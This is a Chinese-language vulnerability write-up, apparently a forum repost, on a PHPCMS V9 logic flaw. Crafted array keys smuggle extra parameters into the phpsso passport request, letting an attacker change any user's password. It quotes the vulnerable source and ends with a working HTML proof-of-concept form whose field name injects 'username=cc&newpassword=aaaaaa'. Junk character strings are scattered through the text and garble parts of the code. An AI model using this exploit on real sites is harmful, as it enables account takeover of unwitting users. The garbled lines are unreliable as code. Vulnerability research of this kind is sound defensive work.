PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：
+ A% \7 H# X. U+ |. p0 _' \
; q: x( n, F* \6 ~! D
, D( J9 N9 k5 z) `6 fparse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);

9 W6 r! ^& n, V% G5 p; t在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
  i. u8 B4 n9 g: L4 j2 K
我把它留给了你们。
不知道你们发现了它没有。

我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。
7 s! W7 s; }; i' a
所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。

也就是

username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。

6 m! D3 B2 m: A, Q  t  M要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。


7 K2 M8 e$ }+ Q. e; E其实我们有这样的机会，看看代码，如下：

! Q- a, p( p' {8 _! \* @
5 I" s$ |6 ]7 H( `5 \& k" ^& N3 {public function auth_data($data) {
: q* S: H4 E8 e# J  a" \                $s = $sep = '';
# U1 p+ T. P8 m. P                foreach($data as $k => $v) {
, q) W. k  a6 E                        if(is_array($v)) {
                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
                                        $sep2 = '&';
                                }
                                $s .= $sep.$s2;
& ]+ s5 R7 a- B" K                        } else {
                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
                        }
                        $sep = '&';
                }

7 t( H) f6 ?. m4 h" k! i4 E, K                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
) }1 J  i) e5 r4 I2 {                return $auth_s;
8 H6 @' y/ m; S8 g        }

可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。
2 p& x0 v. r# z
- {! ~" U9 _8 Z$ {举个例子

$a[aaa=a&bbb] = 'a';

) y, Y' A6 ^: ]7 ]2 t3 K会变成aaa=a&bbb=a
- z3 d" J# R- v1 a- @) `
明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。
/ p( D$ ?& }' B+ w! i! N- t1 I) r2 n
这个时候，我们可以再去看一个函数。
1 S! `# I: H: }1 S, Z; {+ _
' Q' x* K' W# T! b就在这个文件内：


public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
4 i  D* G" }5 F. V7 N* @6 Q                if($email && !$this->_is_email($email)) {
7 U; Q+ {' w# z8 x: F- @( y( u                        return -4;
+ A4 ^& g/ u0 P3 ?; q! }  a' i                }
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }
2 S$ H2 b8 j' k. n+ ]
; k4 x( q( q, w1 R* v* M这是向通行证发了这样一个请求。
$ J1 t* _$ t. I" `4 H2 f
我们再跟到通信证代码里去看看，就会有所发现。


  C5 q2 w. u9 P; Tpublic function edit() {
. y3 ]7 x$ R  Y( j2 ?//能省就省，太长了不是吗？

if($this->username) {
# I# y$ b8 @1 ]+ t//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
' v7 {) ]: s2 A6 Q; m/ a; K" }                                $res = $this->db->update($data, array('username'=>$this->username));
/ I; N$ }2 ?  V$ {) \9 m9 w( _; i                        } else {
0 Z8 H3 ^3 T" {                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
4 k& X8 @* ^/ r8 }                                $res = $this->db->update($data, array('uid'=>$this->uid));
                        }

# p! d& R/ ~- p2 y* ^好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：

; u- b  c- t: |2 R  d4 ^% wpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
2 z6 H( Q9 U- K8 X9 E6 R( j
很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。
. J- L! @+ r6 b6 [0 z1 ^
) e! I1 K% q) N# v6 k& P9 G3 d1 G我当然找到了：
phpcms9/phpcms/modules/member/index.php

. a4 E7 h+ L: a! r% `/ e+ ?+ u$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);

9 [* |2 i+ i& {7 F然后就没有然后了。
. @4 u" R7 c/ I1 H6 P; q
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
                                                <th width="80">邮箱：</th>        
3 D4 P4 e8 m$ \7 d                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
8 }7 o- V$ e8 t* w- U' \" w                                        </tr>
                                        <tr>
/ M# z7 A' {0 |$ J                                                <th width="80">原密码：</th>        
                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
1 G. g/ R  B1 {  N                                        </tr>
                                        <tr>
                                                <th>新密码：</th>
6 Z; y; N- p8 H8 B  F                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
7 w: Q5 g6 i% w! W                                        </tr>
, V) s& O, D6 T) S) _6 [                                        <th></th>
; S( c- }( E+ x. s' w% n! Y! B                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
                                        </tr>
0 Y7 |: I4 T( X) s& L& A                                </table>

% d" V; p/ X& K( i                               
                        </form>
* C  [( Y" X1 T! G+ y# p8 g